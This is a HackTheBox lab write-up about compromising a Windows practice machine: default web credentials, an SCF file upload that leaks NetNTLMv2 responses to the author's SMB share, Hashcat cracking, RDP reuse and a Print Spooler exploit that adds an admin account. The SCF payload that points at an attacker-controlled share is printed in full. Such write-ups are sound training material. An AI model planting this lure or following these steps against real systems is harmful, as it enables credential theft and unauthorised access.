HackTheBox Windows Write-up
First, let's start with basic enumeration and run an Nmap scan. The scan shows a web server, SMB and RDP, all of which come into play later.
When navigating to the web page we are greeted by a login screen. After some searching and not finding anything useful, I tried logging in with the default credentials admin:admin. It was a long shot, but it worked!
The only button on the site that actually did anything was Firmware Update, which lets you upload a file. Since SMB was also open, I went looking and found a site describing SCF (Shell Command File) attacks: an SCF file whose IconFile entry points at an attacker-controlled SMB share makes Windows Explorer fetch the icon over SMB as soon as someone lists the folder the file sits in, and Explorer authenticates to that share with the browsing user's credentials. If whoever reviews the uploaded "firmware" opens that folder, we get their NTLM challenge/response. So let's try it out. The payload looks like this:
[Shell]
Command=2
Iconfile=\\10.10.14.161\share\test.ico
[Taskbar]
Command=ToggleDesktop
I created a payload like the example on that site, started Responder listening on my attacker IP and uploaded the file through the firmware form; shortly after, Responder got a few hits. Now we know the username, and maybe the password if we manage to crack the hash. Note that what Responder captured is not an NTLM hash but a NetNTLM challenge/response (NetNTLMv2 by default on any current Windows version): it can be cracked offline, but it cannot be used directly for pass-the-hash. So let's put Hashcat on it (mode 5600 for NetNTLMv2) and see what we get.
Hashcat cracked the password with ease, so now we can take a look at the SMB share to see if we can find anything interesting.
We didn't find anything interesting, but from the Nmap output we also know that RDP is open, so maybe the same credentials work there.
That was indeed the case, and with an RDP session as that user we already have the user flag. For privilege escalation, running at least WinPEAS is a no-brainer, so I served it from my attacker machine with Python's SimpleHTTPServer and downloaded it onto the target.
Really the only interesting thing WinPEAS found was that the Print Spooler service was running. After some Googling I stumbled across this CVE, which affects the spooler service. So let's get that exploit onto the target machine the same way we did with WinPEAS.
I wasn't able to run the script at first because PowerShell's execution policy blocked it, but after some Googling I found I could just set the policy to Unrestricted. Keep in mind that the execution policy only guards against running scripts by accident; it is not a security boundary, and it can also be bypassed for a single process without touching the machine-wide setting, which is tidier on an engagement.
I ran the exploit and it created a new local administrator account with a username and password of my own choosing. Now the only thing left is to log out and log back in as the new user.
And that's it, we have the root flag! This box wasn't that hard but was still fun and at times challenging due to my lack of experience with Windows hacking. Overall a fun learning experience.